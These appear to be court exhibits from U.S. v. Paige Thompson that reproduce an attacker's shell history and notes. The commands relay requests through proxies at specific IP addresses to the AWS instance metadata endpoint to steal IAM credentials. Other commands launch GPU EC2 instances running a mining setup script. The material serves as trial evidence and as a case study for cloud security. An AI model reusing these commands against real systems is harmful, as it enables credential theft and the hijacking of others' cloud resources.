| 834 | 7037 | aws ec2 describe-instances --region ap-northeast-1 |

810-002



aws.commands ☒

```
1014     7627  eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.113.12.133:80
         http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh`
```

```
 notes ✖

      http://169.254.169.254/latest/meta-data/iam/security-credentials/                    | awssession.sh`
 18
 19          ?
 20   curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.153.227.199:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/                    | awssession.sh
 21
 22   ec2 read access and s3api read
 23    curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.104.68.8:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/
 24
 25
 26    guess whos back
 27    eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.113.12.133:80
      http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh`
 28
 29
 30    apperian            / s3api limited
 31    eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.77.46.101:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh`
 32
 33
```

```
113    402  aws --region us-west-2 --profile safesocial2 iot list-jobs
114    891  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.235.8.209:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
115    909  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80
       --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --user-data
       file://minersetup_eth.sh
116    910  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80
       --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --user-data
       file://minersetup_eth.sh
117    911  aws ec2 describe-subnets --region eu-west-1
118    912  aws ec2 describe-vpcs --region eu-west-1
119    913  aws ec2 create-default-vpc --region eu-west-1
120    914  aws ec2 describe-vpcs --region eu-west-2
121    915  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address
       --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
122    919  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
123    922  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/         | awssession.sh
124    925  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/         | awssession.sh
125    927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab
       --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate --user-data
       file://minersetup_eth.sh
126    928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab
       --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate --user-data
       file://minersetup_eth.sh --key-name default
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 811
Admitted_____

```
25   161  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.198.107.105:443
         http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
26   164  aws ec2 describe-instances --region us-east-1 describe-instances
27   165  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791 --key-name _
         --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544 --instance-initiated-shutdown-behavior terminate
28   166  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791 --key-name _
         --associate-public-ip-address --security-group-ids sg-c719f0ae --instance-initiated-shutdown-behavior terminate
29   167  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 812
Admitted_____